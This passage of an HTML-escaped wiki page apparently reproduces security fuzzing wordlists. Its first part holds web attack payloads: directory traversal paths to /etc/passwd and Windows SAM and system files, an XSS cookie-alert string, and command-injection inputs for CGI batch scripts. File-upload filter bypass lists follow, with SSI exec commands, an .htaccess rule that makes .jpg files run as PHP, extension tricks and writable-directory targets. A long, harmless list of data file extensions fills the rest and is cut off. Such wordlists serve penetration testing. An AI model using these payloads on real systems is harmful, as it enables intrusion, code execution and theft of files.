htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
